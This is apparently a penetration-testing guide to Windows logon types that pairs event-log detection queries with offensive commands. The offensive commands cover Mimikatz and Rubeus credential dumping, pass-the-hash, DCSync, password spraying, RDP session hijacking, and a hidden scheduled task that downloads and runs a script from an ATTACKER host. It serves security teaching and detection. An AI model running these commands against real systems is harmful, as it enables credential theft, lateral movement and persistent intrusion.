Windows Logon Types: A Security Professional's Guide

• 12 min read
Authentication Logon Types Windows Security
Windows Logon Types: A Security Professional's Guide

Introduction

Windows logon types are fundamental to understanding authentication mechanisms, security boundaries, and attack surfaces in Windows environments. Each logon type represents a different method of authentication and carries distinct security implications. For penetration testers and security professionals, understanding these logon types is crucial for:

  • Identifying attack vectors and lateral movement opportunities
  • Understanding credential exposure and harvesting techniques
  • Detecting suspicious authentication patterns
  • Implementing effective security controls

This guide covers all seven primary Windows logon types with technical examples, OffSec methodologies, and practical commands for both offensive and defensive security operations.

Logon Type 2: Interactive

Interactive logon occurs when a user authenticates directly at the console or through Remote Desktop Protocol (RDP). This is the most common logon type for user workstations and represents direct user interaction with the system.

Characteristics

  • User physically present at console or via RDP
  • Credentials are cached in memory (LSASS)
  • Full user profile loaded
  • Access to interactive desktop session
  • Event ID 4624 with Logon Type 2

Technical Examples

Identifying Interactive Logons

# Check current logon session
whoami /logonid

# Query event logs for interactive logons
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} | 
    Where-Object {$_.Properties[8].Value -eq 2} |
    Select-Object TimeCreated, 
        @{N='User';E={$_.Properties[5].Value}}, 
        @{N='SourceIP';E={$_.Properties[18].Value}}

RDP Connection Detection

# Check active RDP sessions
query user
query session

# List RDP connections
qwinsta

In the wild

Interactive logons are prime targets for credential harvesting:

# Mimikatz - Extract credentials from LSASS
privilege::debug
sekurlsa::logonpasswords

# Rubeus - Dump Kerberos tickets
Rubeus.exe dump

# Extract tickets from memory
Rubeus.exe dump /luid:0x123456

Attack Scenario: After gaining initial access, attackers often target interactive sessions to harvest credentials from logged-in users, especially administrators.

Logon Type 3: Network

Network logon occurs when accessing resources over the network without interactive session establishment. This includes SMB shares, network file access, and remote procedure calls.

Characteristics

  • Non-interactive network authentication
  • No user profile loaded
  • Credentials passed over network (often NTLM/Kerberos)
  • Common for SMB, network shares, and remote services
  • Event ID 4624 with Logon Type 3

Technical Examples

SMB Share Access

# Mount network share (triggers Type 3 logon)
net use \\TARGET\C$ /user:DOMAIN\username password

# Access share without mounting
dir \\TARGET\C$\Users

# Using PowerShell
New-PSDrive -Name "Z" -PSProvider FileSystem -Root "\\TARGET\C$" -Credential $cred

PsExec Network Logon

# PsExec creates Type 3 logon
psexec.exe \\TARGET -u DOMAIN\user -p password cmd.exe

# Using Impacket's psexec
python3 psexec.py DOMAIN/user:password@TARGET

In the wild

Network logons are essential for lateral movement:

# Impacket suite - SMB enumeration
smbclient.py DOMAIN/user:password@TARGET
smbexec.py DOMAIN/user:password@TARGET

# Pass-the-Hash with Type 3
psexec.py -hashes :NTHASH DOMAIN/user@TARGET

# Using CrackMapExec
crackmapexec smb TARGET -u user -p password -x "whoami"
crackmapexec smb TARGET -u user -H NTHASH -x "ipconfig"

Attack Scenario: After credential compromise, attackers use network logons to access file shares, execute commands remotely, and enumerate network resources without establishing interactive sessions.

Logon Type 4: Batch

Batch logon is used by scheduled tasks and batch jobs. This logon type is non-interactive and typically runs in the background.

Characteristics

  • Non-interactive scheduled task execution
  • No user profile (unless configured)
  • Runs under service account or user credentials
  • Common persistence mechanism
  • Event ID 4624 with Logon Type 4

Technical Examples

Creating Scheduled Tasks

# Create scheduled task (legacy)
at 14:00 /every:M cmd.exe /c "C:\temp\payload.exe"

# Modern scheduled task creation
schtasks /create /tn "UpdateTask" /tr "C:\temp\payload.exe" /sc daily /st 14:00 /ru "DOMAIN\user" /rp password

PowerShell Scheduled Task

# Create scheduled task via PowerShell
$action = New-ScheduledTaskAction -Execute "C:\temp\payload.exe"
$trigger = New-ScheduledTaskTrigger -Daily -At "2:00PM"
$principal = New-ScheduledTaskPrincipal -UserId "DOMAIN\user" -LogonType Password
Register-ScheduledTask -TaskName "Maintenance" -Action $action -Trigger $trigger -Principal $principal

Enumerating Batch Logons

# List scheduled tasks
schtasks /query /fo LIST /v

# PowerShell enumeration
Get-ScheduledTask | Select-Object TaskName, State, Principal

In the wild

Batch logons are commonly used for persistence:

# Create persistence via scheduled task
schtasks /create /tn "WindowsUpdate" /tr "powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/script.ps1')" /sc onlogon

# Using Metasploit
use exploit/windows/local/scheduled_task
set SESSION 1
exploit

Attack Scenario: After initial compromise, attackers create scheduled tasks with batch logons to maintain persistence, execute payloads, and run commands at specified intervals.

Logon Type 5: Service

Service logon is used when Windows services start and authenticate. Services can run under user accounts, service accounts, or system accounts.

Characteristics

  • Non-interactive service authentication
  • Runs in background
  • Can use domain accounts, local accounts, or SYSTEM
  • High privilege potential
  • Event ID 4624 with Logon Type 5

Technical Examples

Service Account Enumeration

# List services and their accounts
sc query
sc qc ServiceName

# Query specific service
sc query type= service state= all

PowerShell Service Management

# Get services with credentials
Get-WmiObject Win32_Service | Select-Object Name, StartName, State

# Get services via CIM
Get-CimInstance Win32_Service | Where-Object {$_.StartName -notlike "NT AUTHORITY*"} | 
    Select-Object Name, StartName, PathName

Creating Service with Credentials

# Create service with user account
sc create MyService binPath= "C:\temp\service.exe" obj= "DOMAIN\user" password= "password"
sc start MyService

In the wild

Service logons are targets for privilege escalation:

# Unquoted service path exploitation
sc qc ServiceName
# If path is unquoted: C:\Program Files\Service\service.exe
# Can hijack with: C:\Program.exe

# Service account credential extraction
# If service runs as domain user, extract from memory
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

BloodHound Queries:

// Find services running as domain users
MATCH (u:User)-[:HasSession]->(c:Computer)-[:HasService]->(s:Service)
RETURN u.name, c.name, s.name

// Find services with unquoted paths
MATCH (c:Computer)-[:HasService]->(s:Service)
WHERE s.name =~ '.* .*'
RETURN c.name, s.name, s.path

Attack Scenario: Attackers enumerate services to find: - Services running with high privileges - Unquoted service paths (privilege escalation) - Services using domain accounts (credential harvesting) - Weak service configurations

Logon Type 8: NetworkCleartext

NetworkCleartext logon occurs when credentials are sent over the network in cleartext. This is a security risk as credentials are transmitted without encryption.

Characteristics

  • Credentials sent in cleartext
  • No encryption protection
  • High security risk
  • Often from legacy systems or misconfigurations
  • Event ID 4624 with Logon Type 8

Technical Examples

Triggering NetworkCleartext Logon

# Using runas with saved credentials (can trigger Type 8)
runas /savecred /user:DOMAIN\user "cmd.exe"

# Basic authentication over HTTP (cleartext)
# Often seen in web applications with basic auth

Detecting Cleartext Authentication

# Query event logs for Type 8 logons
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} | 
    Where-Object {$_.Properties[8].Value -eq 8} |
    Select-Object TimeCreated, 
        @{N='User';E={$_.Properties[5].Value}}, 
        @{N='SourceIP';E={$_.Properties[18].Value}}

In the wild

NetworkCleartext logons are prime targets for credential interception:

# Network sniffing for cleartext credentials
# Using Wireshark or tcpdump
tcpdump -i eth0 -A 'tcp port 445' | grep -i password

# Using Responder for LLMNR/NBT-NS poisoning
responder -I eth0 -wrf

# Capturing cleartext credentials
# If Type 8 logon occurs, credentials may be intercepted

Attack Scenario: Attackers use network sniffing, LLMNR/NBT-NS poisoning, or man-in-the-middle attacks to intercept cleartext credentials during Type 8 logons. This is particularly dangerous on shared networks.

Logon Type 9: NewCredentials

NewCredentials logon is created when using runas /netonly, which creates a new logon session with different credentials for network authentication while maintaining the current interactive session.

Characteristics

  • New credential set for network operations
  • Original session remains active
  • Only affects network authentication
  • Common for lateral movement
  • Event ID 4624 with Logon Type 9

Technical Examples

Using RunAs /netonly

# Create new credentials for network access
runas /netonly /user:DOMAIN\admin "cmd.exe"

# Then use new session for network operations
net use \\TARGET\C$ /user:DOMAIN\admin password

PowerShell Alternative

# Create credential object
$cred = Get-Credential DOMAIN\admin

# Use Invoke-Command with new credentials
Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock {whoami}

In the wild

NewCredentials is essential for lateral movement:

# Using runas /netonly for lateral movement
runas /netonly /user:DOMAIN\admin cmd.exe
# New cmd window opens with admin credentials for network

# Access network resources
net use \\TARGET\C$ 
dir \\TARGET\C$\Users\Administrator\Desktop

# Using Impacket with different credentials
python3 psexec.py DOMAIN/admin:password@TARGET

BloodHound Usage:

# After runas /netonly, use BloodHound collector
SharpHound.exe -c All -d DOMAIN.local

# Analyze paths with new credentials
# BloodHound shows accessible paths from current position

Attack Scenario: After compromising credentials, attackers use runas /netonly to: - Access network resources with different credentials - Maintain original session while using new credentials - Perform lateral movement without logging out - Test credential validity across the network

Logon Type 10: RemoteInteractive

RemoteInteractive logon is used for Remote Desktop Protocol (RDP) connections. This is similar to Interactive but specifically for remote desktop sessions.

Characteristics

  • RDP-specific logon type
  • Interactive remote session
  • Full desktop access
  • Credentials cached in memory
  • Event ID 4624 with Logon Type 10

Technical Examples

RDP Session Management

# List RDP sessions
query user
query session

# Disconnect RDP session
logoff <session_id>

# Connect to specific session (requires SYSTEM)
tscon <session_id> /dest:console

PowerShell RDP Operations

# Check RDP status
(Get-WmiObject -Class Win32_TerminalServiceSetting -Namespace root\cimv2\TerminalServices).AllowTSConnections

# List logged in users
Get-WmiObject -Class Win32_LoggedOnUser

In the wild

RDP sessions are targets for session hijacking and credential theft:

# RDP Session Hijacking (requires SYSTEM)
# 1. List sessions
query user

# 2. Connect to session (as SYSTEM)
tscon <session_id> /dest:console

# This hijacks the RDP session without password

# Extract credentials from RDP session
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

# Extract Kerberos tickets
Rubeus.exe dump /luid:0x<logon_id>

Attack Scenario: 1. Session Hijacking: With SYSTEM privileges, attackers can hijack existing RDP sessions using tscon, gaining access without credentials. 2. Credential Harvesting: RDP sessions cache credentials in LSASS, making them targets for mimikatz and Rubeus. 3. Lateral Movement: RDP is commonly used for lateral movement after credential compromise.

Detection & Analysis

Event Log Analysis

Windows Security Event Log (Event ID 4624) contains logon type information:

# Query all logon types
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} | 
    ForEach-Object {
        [PSCustomObject]@{
            Time = $_.TimeCreated
            User = $_.Properties[5].Value
            LogonType = $_.Properties[8].Value
            SourceIP = $_.Properties[18].Value
            Process = $_.Properties[9].Value
        }
    } | Format-Table -AutoSize

Logon Type Mapping

Logon Type Value Description
Interactive 2 Local console
Network 3 Network resource access
Batch 4 Scheduled task
Service 5 Windows service
Unlock 7 Workstation unlock
NetworkCleartext 8 Cleartext network auth
NewCredentials 9 RunAs /netonly
RemoteInteractive 10 RDP session
CachedInteractive 11 Cached credentials

SIEM Queries

Splunk Query

index=windows EventCode=4624 Logon_Type=*
| stats count by Logon_Type, Account_Name, Source_Network_Address
| sort -count

ELK/Kibana Query

{
  "query": {
    "bool": {
      "must": [
        {"match": {"event.code": "4624"}},
        {"range": {"logon.type": {"gte": 2, "lte": 11}}}
      ]
    }
  }
}

Suspicious Patterns

# Detect unusual logon type patterns
# Multiple Type 3 logons from same source (lateral movement)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} | 
    Where-Object {$_.Properties[8].Value -eq 3} |
    Group-Object {$_.Properties[18].Value} | 
    Where-Object {$_.Count -gt 10} |
    Select-Object Name, Count

# Type 8 logons (cleartext - security risk)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} | 
    Where-Object {$_.Properties[8].Value -eq 8} |
    Select-Object TimeCreated, 
        @{N='User';E={$_.Properties[5].Value}}, 
        @{N='SourceIP';E={$_.Properties[18].Value}}

Techniques

Mimikatz

Mimikatz is the gold standard for credential extraction:

# Extract all credentials from memory
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

# Extract specific logon session
sekurlsa::logonpasswords /luid:0x123456

# Extract Kerberos tickets
sekurlsa::tickets

# Pass-the-Hash
sekurlsa::pth /user:admin /domain:DOMAIN /ntlm:HASH /run:cmd.exe

Rubeus

Rubeus focuses on Kerberos attacks:

# Dump all tickets
Rubeus.exe dump

# Dump specific LUID
Rubeus.exe dump /luid:0x123456

# Request TGT
Rubeus.exe asktgt /user:admin /password:password /domain:DOMAIN.local

# Pass-the-Ticket
Rubeus.exe ptt /ticket:<base64_ticket>

# Kerberoasting
Rubeus.exe kerberoast

Impacket Suite

Impacket provides Python tools for network authentication:

# SMB enumeration
python3 smbclient.py DOMAIN/user:password@TARGET

# Remote command execution
python3 psexec.py DOMAIN/user:password@TARGET
python3 smbexec.py DOMAIN/user:password@TARGET

# Pass-the-Hash
python3 psexec.py -hashes :NTHASH DOMAIN/user@TARGET

# DCSync attack
python3 secretsdump.py DOMAIN/user:password@DC

# Ticket extraction and reuse
python3 ticketer.py -nthash HASH -domain-sid SID -domain DOMAIN user
python3 ticketConverter.py ticket.kirbi ticket.ccache

BloodHound

BloodHound maps Active Directory relationships:

# Collect data
SharpHound.exe -c All -d DOMAIN.local

# Import to BloodHound
# Analyze paths, find shortest routes to Domain Admin

# Common queries:
# - Find users with DCSync rights
# - Find paths to Domain Admins
# - Find Kerberoastable accounts
# - Find AS-REP roastable accounts

CrackMapExec

Network authentication and lateral movement:

# SMB authentication
crackmapexec smb 192.168.1.0/24 -u user -p password

# Pass-the-Hash
crackmapexec smb 192.168.1.0/24 -u user -H NTHASH

# Execute commands
crackmapexec smb TARGET -u user -p password -x "whoami"

# Dump SAM
crackmapexec smb TARGET -u user -p password --sam

# Spray passwords
crackmapexec smb TARGETS.txt -u users.txt -p passwords.txt

WinRM

Windows Remote Management for lateral movement:

# Enable WinRM (if needed)
Enable-PSRemoting -Force

# Remote command execution
Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock {whoami}

# Using Evil-WinRM
evil-winrm -i TARGET -u user -p password

Practical Attack Chain

Scenario: Initial access → Credential harvesting → Lateral movement

# 1. Initial access (phishing, exploit, etc.)
# 2. Extract credentials from memory
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

# 3. Use credentials for lateral movement
runas /netonly /user:DOMAIN\admin cmd.exe
net use \\TARGET\C$ 

# 4. Execute commands remotely
psexec.py DOMAIN/admin:password@TARGET

# 5. Harvest more credentials
# 6. Repeat until Domain Admin access

Defensive Considerations

  1. Monitor Event ID 4624 for unusual logon types
  2. Alert on Type 8 (NetworkCleartext) logons
  3. Monitor Type 9 (NewCredentials) for lateral movement
  4. Restrict RDP access and monitor Type 10 sessions
  5. Implement LAPS for local administrator passwords
  6. Use Protected Users group to prevent credential caching
  7. Enable Credential Guard to protect LSASS
  8. Monitor service accounts (Type 5) for privilege escalation
  9. Audit scheduled tasks (Type 4) for persistence
  10. Implement network segmentation to limit lateral movement

Conclusion

Understanding Windows logon types is fundamental for both offensive and defensive security operations. Each logon type represents different authentication mechanisms with distinct security implications. For penetration testers, recognizing these types enables:

  • Effective credential harvesting strategies
  • Lateral movement techniques
  • Persistence mechanisms
  • Privilege escalation opportunities

For defenders, monitoring and analyzing logon types provides:

  • Detection of suspicious authentication patterns
  • Identification of attack vectors
  • Security control implementation
  • Incident response capabilities

Mastering logon types enhances both red team operations and blue team defenses in Windows environments.

References